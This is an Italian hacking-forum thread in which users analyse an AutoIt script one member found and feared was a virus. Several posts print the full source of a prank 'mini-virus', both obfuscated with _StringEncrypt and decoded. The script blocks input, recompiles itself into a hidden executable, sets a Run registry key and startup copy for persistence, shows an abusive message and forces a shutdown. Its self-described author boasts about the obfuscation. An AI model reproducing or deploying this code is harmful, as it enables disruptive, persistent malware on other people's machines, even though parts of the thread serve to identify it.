help, credo che help serve per questa cosa in questa sezione

« Older   Newer »
  Share  
harry dinner2
CAT_IMG Posted on 10/6/2008, 09:57     +1   -1




raga ho fatto copia e incolla da un forum nn e mio qundi. avrei bisognio che mi dite se un virus metto il incolla nel codice

CODICE
$file=_StringEncrypt(0,"F82071F1A21EBA312301A36612456311CFE122E300CF50AB","b")
Questa è la prima riga di codice da pulire nel registro

regwrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run","AVVIO","REG_SZ",_StringEncrypt(0,"F82071F1A21EB94B2071A3681337671ECBEA23EA03CF","b"))
FileCopy(_StringEncrypt(0,"F82071F1A21EB94B2071A3681337671ECBEA23EA03CF","b"),@StartupDir&_StringEncrypt(0,"EBD5E9E7C077E516394E25D12D117B135FB6","bca"))
Msgbox(48,_stringencrypt(0,"CD6630C2E8705893F6B003FFF7C362633D499A809C47","a"),_stringencrypt(0,"F6D405DFB876886C1AEAD1A822A6CF1E958BDA653E46305FC8FFEDAD2FC8F8E857654BA283A3E6330107C588A74B21B0E57D007AE6252DB2A1B0C2A699D9E0B076C613081824FCAC21F1906EB323D3337B286C2871319E31DC064DEA3B26812F448C15B240ED6E45A1289001909417577F763665E57C88350C9B9D2FDEB0813C025F764A1771BF8E93FB24FCFDE8F355569FD9F2D544AE302CAE95F725994BE1EEDE9EAD42BC177DCA964E60931A1C1B790D68DB512B1EF70B1AB6CD091FCAEBE4938CFBB4F859971ADBEE9C08DC7177736968CF95781AB68A675F1D61B48C01B5CA6F04B518FEFA2C52B38936BA7FB444D5BF8EA3BF9273BFE60E2AA703C8588BC78F8562F20DDFDEE87BB7136A","ab")&@crlf&_StringEncrypt(0,"F2FA1F7F7C40103228AAA58275EA2B54E283E12DFAE21ABB69323357EF6E","ba"),4)

ed ecco le 3 stringhe che vanno sul registro e sistemano inserendo e Copyando i 3 codici

Bellissimo


cmq anche se nn e un virus potete prendervelo a me nn serve
 
Top
harry dinner2
CAT_IMG Posted on 10/6/2008, 10:26     +1   -1




sul serio
 
Top
MatteoJug
CAT_IMG Posted on 10/6/2008, 10:50     +1   -1




Tradotto:
CODICE
$file="C:\prova.au3"
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run","AVVIO","REG_SZ","C:\ciao.exe")
FileCopy("C:\ciao.exe",@StartupDir & "\hola.exe")
Msgbox(48,"CIAO HACKER", "E tu saresti un Hacker? Sei solo un pezzo di merda ke si gasa tutto perchè ha scritto ciao sul pc con autoIt... Cresci brutta Merda!!!!" & @crlf & "By Red Skull 92",4)
 
Top
harry dinner2
CAT_IMG Posted on 10/6/2008, 10:52     +1   -1




°-° nn lo sapevo ma cmq e un codice inocente?
 
Top
MatteoJug
CAT_IMG Posted on 10/6/2008, 10:58     +1   -1




da se si, però se ci metti anche "ciao.exe", potrebbe essere pericoloso a seconda del file ciao.
 
Top
harry dinner2
CAT_IMG Posted on 10/6/2008, 11:10     +1   -1




nn e il mio codice. nn ho mai avuto sti tipi di problemi fino ad ora
questo e il forum

SPAM

Edited by I.Ren - 12/6/2008, 19:31
 
Top
MatteoJug
CAT_IMG Posted on 10/6/2008, 11:23     +1   -1




Codice:
CODICE
#include<string.au3>
#NoTrayIcon
BlockInput(1)
$file="C:prova.au3"
FileCopy(@scriptfullpath,$file)
ShellExecute("C:ProgrammiAutoIt3Aut2ExeAut2Exe.exe","/in C:prova.au3 /out " & "C:ciao.exe")
Sleep(5000)
FileSetAttrib("C:ciao.exe","+RH"); Sola Lettura / Nascosto
regwrite("HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun","AVVIO","REG_SZ","C:ciao.exe")
FileCopy("C:ciao.exe",@StartupDir & "hola.exe")
Msgbox(48,"CIAO HACKER", "E tu saresti un Hacker? Sei solo un pezzo di merda ke si gasa tutto perchè ha scritto ciao sul pc con autoIt... Cresci brutta Merda!!!!" & @crlf & "By Red Skull 92",4)
Shutdown(9)

Si, è un "mini-virus" che si autocopia nelle directory di avvio e parte all'avvio del sistema, mostra uno stupido messaggino e fa spegnere il computer...
Da principianti...
 
Top
harry dinner2
CAT_IMG Posted on 10/6/2008, 11:38     +1   -1




allora nn lo faccio
 
Top
RedSkull92
CAT_IMG Posted on 10/6/2008, 21:45     +1   -1




OMG Questo è un mio piccolo programmino scherzo... dove lo hai preso?
cmq avete sbagliato
questo programmino si copia nella directory @homedrive&"\ciao.au3"
dopo si autocompila spostandosi in varie cartelle...
quindi non credo proprio sia da principianti...
e dopo spegne il pc è criptato con _stringencript e non credo ke un nubbio capirebbe cosa fà...(non sò perchè voi non l'avete capito cosa fà O.O
ps:Quello non è tutto il sorgente...
 
Top
MatteoJug
CAT_IMG Posted on 10/6/2008, 21:50     +1   -1




Potresti postare tutto il sorgente, curiosità personale...
 
Top
RedSkull92
CAT_IMG Posted on 10/6/2008, 22:02     +1   -1




ah ora non è più da principianti LOOOOOOOOOOOOL cmq il sorgente è questo.. ma nel corso del tempo ho aggiunto altre parecchie funzioni per esempio far eseguire le funzioni anche se sono criptate e cose varie...
CODICE
#include<string.au3>
#NoTrayIcon
BlockInput(1)
$file=_StringEncrypt(0,"F82071F1A21EBA312301A36612456311CFE122E300CF50AB","b")
FileCopy(@scriptfullpath,$file)
ShellExecute("C:\Programmi\AutoIt3\Aut2Exe\Aut2Exe.exe","/in C:\prova.au3 /out "&_StringEncrypt(0,"F82071F1A21EB94B2071A3681337671ECBEA23EA03CF","b"))
Sleep(5000)
FileSetAttrib(_StringEncrypt(0,"F82071F1A21EB94B2071A3681337671ECBEA23EA03CF","b"),"+RH")
regwrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run","AVVIO","REG_SZ",_StringEncrypt(0,"F82071F1A21EB94B2071A3681337671ECBEA23EA03CF","b"))
FileCopy(_StringEncrypt(0,"F82071F1A21EB94B2071A3681337671ECBEA23EA03CF","b"),@StartupDir&_StringEncrypt(0,"EBD5E9E7C077E516394E25D12D117B135FB6","bca"))
Msgbox(48,_stringencrypt(0,"CD6630C2E8705893F6B003FFF7C362633D499A809C47","a"),_stringencrypt(0,"F6D405DFB876886C1AEAD1A822A6CF1E958BDA653E46305FC8FFEDAD2FC8F8E857654BA283A3E6330107C588A74B21B0E57D007AE6252DB2A1B0C2A699D9E0B076C613081824FCAC21F1906EB323D3337B286C2871319E31DC064DEA3B26812F448C15B240ED6E45A1289001909417577F763665E57C88350C9B9D2FDEB0813C025F764A1771BF8E93FB24FCFDE8F355569FD9F2D544AE302CAE95F725994BE1EEDE9EAD42BC177DCA964E60931A1C1B790D68DB512B1EF70B1AB6CD091FCAEBE4938CFBB4F859971ADBEE9C08DC7177736968CF95781AB68A675F1D61B48C01B5CA6F04B518FEFA2C52B38936BA7FB444D5BF8EA3BF9273BFE60E2AA703C8588BC78F8562F20DDFDEE87BB7136A","ab")&@crlf&_StringEncrypt(0,"F2FA1F7F7C40103228AAA58275EA2B54E283E12DFAE21ABB69323357EF6E","ba"),4)
Shutdown(_StringEncrypt(0,"96D2","bca"))

Non posto quello nuovo perchè causerebbe un utilizzo immenso da parte di lamer...
 
Top
harry dinner2
CAT_IMG Posted on 10/6/2008, 22:04     +1   -1




la soregente e questa SORGENTE

GRZ DI CUORE RAGA ORA SO CHE NN LO DEVO APRIRE THX THX
 
Top
RedSkull92
CAT_IMG Posted on 10/6/2008, 22:06     +1   -1




Boh kissà dove avrà preso il mio sorgente vecchio...
credo in un sito...
 
Top
lknokl
CAT_IMG Posted on 11/6/2008, 09:15     +1   -1




Red se vuoi te lo faccio postare nella top user cosi lo vede solo gente davvero interessata alla programmazione e non al laming
 
Top
Jac123
CAT_IMG Posted on 11/6/2008, 10:43     +1   -1




senza offesa ma in quel foro mi sembrano tt lamerozzi...
 
Top
16 replies since 10/6/2008, 09:57   191 views
  Share